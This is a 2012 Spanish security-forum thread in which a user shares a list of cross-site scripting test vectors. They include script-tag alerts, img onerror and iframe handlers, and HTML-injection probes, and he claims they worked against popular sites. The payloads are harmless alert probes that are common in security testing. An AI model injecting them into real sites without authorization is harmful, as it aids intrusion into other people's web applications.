Underc0de

[In]Seguridad Informática => Bugs y Exploits => Topic started by: Dedalo on June 30, 2012, 06:33:36 pm

Title: Vectores de Ataque Xss
Post by: Dedalo on June 30, 2012, 06:33:36 pm
Se que hay ya muchos Lists de vectores para Xss pero Les voy a pasar los que usé para algunos de mis mejores Xss:



Code: You are not allowed to view links. Register or Login
"><script>alert(0)</script>
</title><script>alert(/SeguridadBlanca/)</script>
"/><script>alert(1);</script>
'"><script>alert(0);</script>
"><iframe onclick=alert(1)></iframe>
</textarea>"><script>prompt(1)</script>
"><img src=x onerror=prompt(1);>
//>'>"><img src=x onerror=prompt(1);>
"><img src=x onerror=alert(/SeguridadBlanca/);>


Como me gusta chrome el que mas uso para probar antes de mandarme a testear con el firefox para que salten uso:


Code: You are not allowed to view links. Register or Login
"><h1>hols</h1>
"><marquee>sb</h1>
"/><img src=x />


Hasta los populares han caido con estos Vectores...



(https://p.twimg.com/AtIsW62CEAEdCCO.png:large)

(https://p.twimg.com/AsPaNCaCIAA8fhi.png:large)

(https://p.twimg.com/AuFvak3CIAEv1oY.png:large)

(https://p.twimg.com/AuCPD0XCAAAmRbr.png:large)

(https://p.twimg.com/AwqUFA6CIAA3RE3.png:large)

Saludos,
Dedalo
Title: Re:Vectores de Ataque Xss
Post by: Pr0ph3t on June 30, 2012, 06:35:27 pm
Buenisimo como siempre Dedalo, gracias ;) :P
Title: Re:Vectores de Ataque Xss
Post by: Anton on August 10, 2013, 08:26:04 pm
Buenisimo :D Gracias por los vectores :)